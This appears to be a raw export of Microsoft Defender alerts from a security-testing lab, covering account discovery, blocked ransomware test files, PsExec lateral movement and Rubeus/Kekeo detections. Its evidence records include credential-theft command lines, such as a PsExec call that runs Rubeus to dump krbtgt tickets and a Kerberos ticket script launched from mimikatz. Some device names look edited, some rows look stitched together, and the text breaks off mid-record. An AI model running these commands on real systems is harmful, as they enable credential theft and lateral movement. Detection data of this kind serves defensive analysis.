null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:18:39.2366667Z | Suspicious | None | svc_acct | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516302847098_-1773955767 | 48b744e2-d25c-40b8-afdb-e4cfc530cbc0 | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:20:30.2847303Z | 2022-11-12T01:35:43.1766667Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:16:44.6919693Z | 2022-11-11T08:17:36.5981924Z | Suspicious User Account Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1033",
"T1087",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "malicious.io",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:30.33Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:30.33Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"net.exe\" user /domain",
"processCreationTime": "2022-11-11T08:17:06.0049839Z",
"processId": 684,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:30.33Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads\\internal'",
"processCreationTime": "2022-11-11T08:16:44.2952776Z",
"processId": 4704,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:30:51.1933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"net.exe\" user ronhd /domain",
"processCreationTime": "2022-11-11T08:17:06.5868676Z",
"processId": 2236,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638065141690799395_574213459 | cdeae75b-8c21-4259-b37e-f8659c85a5f6 | 794 | MicrosoftDefenderForEndpoint | 2022-12-13T07:42:49.0799617Z | 2022-12-13T07:51:49.87Z | 2022-12-13T07:51:49.6590458Z | 2022-12-13T07:29:32.109068Z | 2022-12-13T07:29:32.109068Z | 'Encryptest' ransomware was prevented | Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Ransomware | Resolved | Medium | 57 | SuccessfullyRemediated | null | null | WindowsDefenderAv | 51d03c45-b142-4de4-95df-01b0c259d8f6 | Automation | null | Encryptest | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-12-13T07:14:16.856Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MASTER/providers/Microsoft.Compute/virtualMachines/MASTER-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "c7a645fc-c80c-4108-93bc-60a27bc7ba8b"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-13T07:42:49.13Z",
"fileName": "ransomware_testfile_unsigned.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Controlled Folder Access",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-13T07:42:49.4333333Z",
"fileName": "UNSIGNED_ransomware_test_exe.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Execution of untrusted or unsigned executables inside removable USB media",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:57:32.0566667Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 4,216 | PSEXESVC.exe | 2022-12-22T08:47:50.8661147Z | 748 | 2022-12-22T08:38:52.5569028Z | services.exe | C:\Windows\System32 | Detected | 4f111b3b2366eacdcc66d7ad73548fff9b039c15 |
da638045930747995801_1774314318 | 51dd330f-40c1-4ba4-bd2d-52e332a80a92 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:34.7995952Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:01:45.0435409Z | 2022-11-21T02:33:42.858223Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | Resolved | Medium | 49 | TerminatedBySystem | TruePositive | SecurityTesting | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "None",
"tags": [
"MDE-Management",
"semi auto",
"servers"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
aae6f9e318-66cd-49ef-a358-b7b5fd056532 | e6f9e318-66cd-49ef-a358-b7b5fd056532 | 486 | MicrosoftDefenderForIdentity | 2022-09-30T06:19:23.8899527Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:27.985664Z | 2022-09-30T06:13:27.988353Z | Remote code execution attempt | An actor attempted to run commands remotely on MSDXV2-DC from MSDXV2-Win10V, using 1 service. | Execution | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | AzureATP | RemoteExecutionSecurityAlert | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1047",
"T1059",
"T1053",
"T1569",
"T1059.001",
"T1053.002",
"T1053.005",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:39.2166667Z | Suspicious | None | svc_acct | NT AUTHORITY | S-1-5-18 | null | null | ed5324a2b10ad1342da6332982e4c8ec4c3cd096 | fc4864065d84ccb4c855f4c47afa318113c1ba81e105c2ca0a8a33b51fe72299 | ntoskrnl.exe | C:\Windows\System32 | 4 | null | 2022-11-11T08:13:24.9197363Z | null | null | null | null | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T16:44:32.9466667Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516153050151_-2032732023 | 5f10445d-f5c8-48b6-b412-38971bef3c6b | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:20:15.3050338Z | 2022-11-12T01:35:43.1766667Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:17:13.3984128Z | 2022-11-11T08:17:13.3984128Z | Possible use of the Rubeus kerberoasting tool | Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication.
During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets. | SuspiciousActivity | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 6606ef29-d293-4f24-a7c5-334dcb40b412 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1558.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:15.35Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:15.35Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:17:12.5367426Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 2352,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-11T08:17:13.2310192Z",
"processId": 3344,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:15.35Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:17:12.3967497Z",
"parentProcessFileName": "mimikatz.exe",
"parentProcessFilePath": "C:\\M365DAttack\\Mimikatz\\x64",
"parentProcessId": 6556,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-11T08:17:12.5367426Z",
"processId": 2352,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:12:07.6266667Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072966347760708_134501400 | 901dd607-1ad3-4be3-b546-4ffd48e8a90f | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T09:03:54.7760895Z | 2022-12-22T09:03:55.5666667Z | null | 2022-12-22T08:47:34.3612687Z | 2022-12-22T08:47:34.3612687Z | 'Kekeo' malware was detected | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | New | Informational | 61 | PendingApproval | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | null | null | Kekeo | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T09:03:54.8033333Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T05:26:35.34Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
ed638042112640429048_-201844297 | ed638042112640429048_-201844297 | 731 | MicrosoftDefenderForEndpoint | 2022-11-16T16:01:04.0430499Z | 2022-11-16T16:13:19.7266667Z | 2022-11-16T16:13:19.4204429Z | 2022-11-16T04:56:27.3618891Z | 2022-11-16T04:56:27.3618891Z | Test ASR | test123 | InitialAccess | Resolved | High | 43 | Benign | null | null | CustomDetection | f9135d0a-11d9-4858-af84-9c5cff54a437 | null | null | null | [
"T1189",
"T1133",
"T1190",
"T1078.003"
] | [
{
"aadDeviceId": "7711ee94-033f-495e-bc7a-53e7c1e57111",
"defenderAvStatus": "NotSupported",
"deviceDnsName": "vpn.zone",
"firstSeen": "2022-09-19T08:40:31.865Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "252919130a29cc07e305c5c4ef99e5435b96b889",
"onboardingStatus": "Onboarded",
"osBuild": 22000,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "21H2",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10A",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "77cf6d06-c483-4fb3-a859-9bbd9c9ac8e2"
}
}
] | [
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-16T16:01:04.1333333Z",
"fileName": "WaAppAgent.exe",
"filePath": "C:\\WindowsAzure\\GuestAgent_2.7.41491.1071_2022-10-12_040513",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T04:52:37.3682423Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 632,
"processCommandLine": "WaAppAgent.exe",
"processCreationTime": "2022-11-16T04:52:44.6944805Z",
"processId": 2336,
"registryHive": null,
"registryKey": null,
"registryValue": null,
